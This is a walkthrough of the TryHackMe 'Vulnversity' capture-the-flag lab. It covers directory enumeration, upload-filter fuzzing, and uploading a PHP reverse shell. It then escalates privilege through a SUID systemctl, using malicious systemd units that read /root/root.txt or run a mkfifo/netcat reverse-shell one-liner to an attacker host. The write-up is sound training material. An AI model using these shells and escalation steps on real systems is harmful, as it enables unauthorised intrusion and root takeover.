Table of Contents
TRY HACK ME
- TryHackMe: Cyber security training through short, gamified, real-world labs. Content for complete beginners and seasoned hackers.
Vulnversity
Write-Ups: n0w4n
Port/Version Scan
GoBuster (dirs)
Brute-force directories & files, DNS subdomains, and virtual host names.
apt-get install gobuster
wordlists under /usr/share/wordlists
Syntax: gobuster dir -u http://<ip>:3333 -w <word list location>
-e Print the full URLs in your console
-u The target URL
-w Path to your wordlist
-U and -P Username and Password for Basic Auth
-p <x> Proxy to use for requests
-c <http cookies> Specify a cookie for simulating your auth
n0w4n: Used DirSearch
dirsearch -u http://10.10.207.138:3333 -e php -x 400,404
Burp: Intruder
Burp Suite Intruder: Fuzz the /internal/ directory to see what kinds of file extensions it will allow you to upload.
n0w4n: Load the wordlist and don’t forget to disable the encode options. If you forget this, you will not have the proper result as your filename will be file%2ephp, which won’t work.
- I did that… and it didn't work.
Reverse Shell
Obtain an exploit reverse shell to upload: pentestmonkey
- You have to rename it .phtml to upload it.
- Upload it.
- Start a listener on your attack machine:
nc -lvnp 1234 # -l listener # -v verbose # -n numeric-only IPs, no DNS # -p port (local port number)
- Then execute the .phtml file on the target machine:
http:[IP]:3333/internal/uploads
Privilege Escalation
n0w4n: For a lot of CTFs, a good find are files with the SUID bit set.
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
# -l long listing format
# -d list directory names, not contents
Or use PEASS: PrivilegeEscalation Awesom Scripts Suite
- Linpeas: Linux local Privilege Escalation Awesome Script (.sh)
Discovered Vulnerability: systemctl is SUID root
Exploit
n0w4n: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE.
- First we create a variable which holds a unique file (on target machine).
eop=$(mktemp).service
- Then we create an unit file and write it into the variable. Inside the unit file we enter a command that will let the shell execute the command
catand redirect the output ofcatto a file calledoutputin the folder/tmp/.
echo '[Service] > ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output" > [Install] > WantedBy=multi-user.target' > $eop
- And finally we use the /bin/systemctl program to enable the unit file.
/bin/systemctl link $eop # Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service. /bin/systemctl enable --now $eop # Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
- Find it:
ls -lah /tmp
Alternative Exploit
To get a reverse root shell:
NOTE: the target machine is using netcat OpenBSD, NOT the traditional netcat. That means the -e (execute) flag will not work. See Netcat (Traditional) and **Netcat (OpenBSD)“ (OpenBSD netcat removed the -e flag “for security” ( link).
# nc (openbsd): rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f
- Create your unit file:
echo '[Service] Type=oneshot ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f" [Install] WantedBy=multi-user.target' > gk.service
- Open a listener on your attack machine:
nc -lvnp 7777
- Link and start the service:
/bin/systemctl link /tmp/gk.service # need the full path /bin/systemctl enable --now /tmp/gk.service
Done.